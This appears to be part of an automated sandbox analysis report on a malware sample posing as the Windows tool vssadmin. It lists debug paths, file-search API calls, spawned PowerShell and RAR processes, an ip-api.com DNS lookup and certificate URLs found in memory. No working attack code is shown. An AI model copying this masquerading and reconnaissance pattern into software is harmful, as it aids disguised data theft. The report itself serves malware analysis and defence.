Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASMOpenSSL 1.1.1u 30 May 2023built on: Wed May 31 23:27:41 2023 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-1_1"not available source: VSSADMIN.EXE.exe, 00000001.00000002.245453028.00007FFD3FE3F000.00000040.00000001.01000000.0000000F.sdmp
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: VSSADMIN.EXE.exe, 00000000.00000003.187735351.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.246585404.00007FFD59301000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: VSSADMIN.EXE.exe, 00000000.00000003.187735351.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.246585404.00007FFD59301000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: VSSADMIN.EXE.exe, 00000001.00000002.246056631.00007FFD43FF1000.00000040.00000001.01000000.0000000B.sdmp
Source: Binary string: 0.pdb(kD . source: powershell.exe, 00000025.00000002.224011476.000001FBAB192000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\libcrypto-1_1.pdb source: VSSADMIN.EXE.exe, VSSADMIN.EXE.exe, 00000001.00000002.245453028.00007FFD3FEC1000.00000040.00000001.01000000.0000000F.sdmp
Source: Binary string: D:\Projects\WinRAR\rar\build\rar64\Release\RAR.pdb source: rar.exe, 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmp, rar.exe, 0000003B.00000000.226038634.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\python311.pdb source: VSSADMIN.EXE.exe, 00000001.00000002.245659423.00007FFD402EB000.00000040.00000001.01000000.00000004.sdmp
Source: Binary string: D:\a\1\b\libssl-1_1.pdb source: VSSADMIN.EXE.exe, VSSADMIN.EXE.exe, 00000001.00000002.245935470.00007FFD43F76000.00000040.00000001.01000000.00000010.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: VSSADMIN.EXE.exe, 00000001.00000002.246494699.00007FFD592D1000.00000040.00000001.01000000.0000000D.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\ozweafg0\ozweafg0.pdbhP source: powershell.exe, 00000025.00000002.213633316.000001FB93A2A000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: VSSADMIN.EXE.exe, 00000001.00000002.246395707.00007FFD59241000.00000040.00000001.01000000.00000006.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: VSSADMIN.EXE.exe, 00000001.00000002.246442794.00007FFD59271000.00000040.00000001.01000000.00000011.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: VSSADMIN.EXE.exe, 00000001.00000002.246221693.00007FFD5269C000.00000040.00000001.01000000.00000008.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: VSSADMIN.EXE.exe, 00000001.00000002.246354219.00007FFD55601000.00000040.00000001.01000000.00000012.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: VSSADMIN.EXE.exe, 00000001.00000002.246221693.00007FFD5269C000.00000040.00000001.01000000.00000008.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: VSSADMIN.EXE.exe, 00000001.00000002.246310845.00007FFD52DF1000.00000040.00000001.01000000.00000009.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: VSSADMIN.EXE.exe, 00000001.00000002.246171168.00007FFD507E1000.00000040.00000001.01000000.0000000C.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: VSSADMIN.EXE.exe, 00000001.00000002.246126564.00007FFD449E1000.00000040.00000001.01000000.0000000A.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: VSSADMIN.EXE.exe, VSSADMIN.EXE.exe, 00000001.00000002.246012635.00007FFD43FC1000.00000040.00000001.01000000.0000000E.sdmp
Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe | Code function: 0_2_00007FF614C86744 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,0_2_00007FF614C86744
Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe | Code function: 0_2_00007FF614C77850 FindFirstFileExW,FindClose,0_2_00007FF614C77850
Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe | Code function: 0_2_00007FF614C909E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF614C909E4
Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe | Code function: 1_2_00007FF614C86744 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,1_2_00007FF614C86744
Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe | Code function: 1_2_00007FF614C77850 FindFirstFileExW,FindClose,1_2_00007FF614C77850
Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe | Code function: 1_2_00007FF614C909E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,1_2_00007FF614C909E4
Source: C:\Users\user\AppData\Local\Temp\_MEI68562\rar.exe | Code function: 59_2_00007FF6EE7546EC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,59_2_00007FF6EE7546EC
Source: C:\Users\user\AppData\Local\Temp\_MEI68562\rar.exe | Code function: 59_2_00007FF6EE7988E0 FindFirstFileExA,59_2_00007FF6EE7988E0
Source: C:\Users\user\AppData\Local\Temp\_MEI68562\rar.exe | Code function: 59_2_00007FF6EE74E21C FindFirstFileW,FindClose,CreateFileW,DeviceIoControl,CloseHandle,59_2_00007FF6EE74E21C

              Networking

              barindex
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe DNS query: name: ip-api.com
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe DNS query: name: ip-api.com
              Source: powershell.exe, 00000008.00000002.200799345.0000019600202000.00000004.00000800.00020000.00000000.sdmp String found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Version, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:DefaultNoun, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:InstanceCmdlets, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:StaticCmdlets, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:CmdletAdapterPrivateData
              Source: powershell.exe, 00000008.00000002.200799345.0000019600202000.00000004.00000800.00020000.00000000.sdmp String found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:AllowEmptyCollection, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:AllowEmptyString, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:AllowNull, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateNotNull, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateNotNullOrEmpty, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateCount, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateLength, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateRange, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateSet, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Obsolete
              Source: powershell.exe, 00000008.00000002.200799345.0000019600202000.00000004.00000800.00020000.00000000.sdmp String found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Type, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:MaxValueQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:RegularQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ExcludeQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:MinValueQuery
              Source: VSSADMIN.EXE.exe, 00000000.00000003.188122863.000002413348F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digi
              Source: VSSADMIN.EXE.exe, 00000000.00000003.187886205.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188359144.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187947489.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187925323.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187886205.000002413348F000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187766996.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188385630.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187840544.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187859504.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187787611.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188146324.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187811955.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187991838.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188204639.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187904602.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188454384.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188359144.000002413348F000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188122863.0000024133482000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
              Source: VSSADMIN.EXE.exe, 00000000.00000003.187886205.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188359144.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187947489.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187925323.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187766996.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188385630.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187840544.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187859504.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187787611.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188146324.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187811955.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187991838.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188204639.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187904602.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188454384.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188122863.0000024133482000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
              Source: VSSADMIN.EXE.exe, 00000000.00000003.187886205.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188359144.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187947489.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187925323.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187766996.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188385630.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187840544.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187859504.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187787611.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188146324.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187811955.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187991838.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188204639.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187904602.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188454384.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188122863.0000024133482000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
              Source: VSSADMIN.EXE.exe, 00000000.00000003.187886205.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188359144.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187947489.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187925323.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187886205.000002413348F000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187766996.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188385630.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187840544.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187859504.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187787611.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188146324.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187811955.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187991838.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188204639.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188122863.000002413348F000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187904602.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188454384.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188359144.000002413348F000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188122863.0000024133482000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
              Source: VSSADMIN.EXE.exe, 00000000.00000003.188312658.0000024133482000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
              Source: VSSADMIN.EXE.exe, 00000001.00000002.245082174.0000014C6D256000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.245055208.0000014C6D1B3000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.245103939.0000014C6D276000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.244323782.0000014C6D256000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.244150450.0000014C6D269000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.204299470.0000019668D80000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.223682537.000001FBAB080000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
              Source: VSSADMIN.EXE.exe, 00000001.00000003.244166649.0000014C6D0D5000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.244940177.0000014C6D0D5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.p
              Source: VSSADMIN.EXE.exe, 00000001.00000003.244166649.0000014C6D0D5000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.244940177.0000014C6D0D5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalT
              Source: VSSADMIN.EXE.exe, 00000001.00000003.244317157.0000014C6CDAB000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.244787764.0000014C6CDAD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl
              Source: VSSADMIN.EXE.exe, 00000001.00000002.245055208.0000014C6D23B000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.244726303.0000014C6CCC8000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.244670872.0000014C6C9B0000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.244726303.0000014C6CC54000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.244150450.0000014C6D269000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.204299470.0000019668D80000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.223682537.000001FBAB080000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
              Source: VSSADMIN.EXE.exe, 00000001.00000003.244317157.0000014C6CDAB000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.244787764.0000014C6CDAD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl;
              Source: powershell.exe, 00000025.00000002.224011476.000001FBAB187000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.micro
              Source: VSSADMIN.EXE.exe, 00000000.00000003.188312658.0000024133482000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
              Source: VSSADMIN.EXE.exe, 00000000.00000003.188312658.0000024133482000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
              Source: VSSADMIN.EXE.exe, 00000000.00000003.187886205.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188359144.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187947489.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187925323.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187886205.000002413348F000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187766996.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188385630.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187840544.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187859504.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187787611.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188146324.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187811955.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187991838.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188204639.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188122863.000002413348F000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187904602.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188454384.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188359144.000002413348F000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188122863.0000024133482000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
              Source: VSSADMIN.EXE.exe, 00000000.00000003.187886205.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188359144.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187947489.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187925323.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187766996.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188385630.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187840544.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187859504.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187787611.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188146324.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187811955.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187991838.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188204639.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187904602.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188454384.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188122863.0000024133482000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
              Source: VSSADMIN.EXE.exe, 00000000.00000003.187886205.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188359144.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187947489.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187925323.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187766996.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188385630.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187840544.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187859504.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187787611.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188146324.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187811955.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187991838.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188204639.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187904602.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188454384.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188122863.0000024133482000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
              Source: VSSADMIN.EXE.exe, 00000000.00000003.188122863.0000024133482000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
              Source: VSSADMIN.EXE.exe, 00000000.00000003.187886205.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188359144.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187947489.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187925323.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187766996.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188385630.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187840544.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187859504.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187787611.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188146324.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187811955.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187991838.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188204639.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.187904602.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188454384.0000024133482000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000000.00000003.188122863.0000024133482000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
              Source: VSSADMIN.EXE.exe, 00000000.00000003.188312658.0000024133482000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
              Source: VSSADMIN.EXE.exe, 00000001.00000003.190605654.0000014C6CBE7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf);
              Source: powershell.exe, 00000025.00000002.213108359.000001FB90F99000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://go.microsoft.c
              Source: powershell.exe, 00000025.00000002.213108359.000001FB90F99000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://go.microsoft.ctain
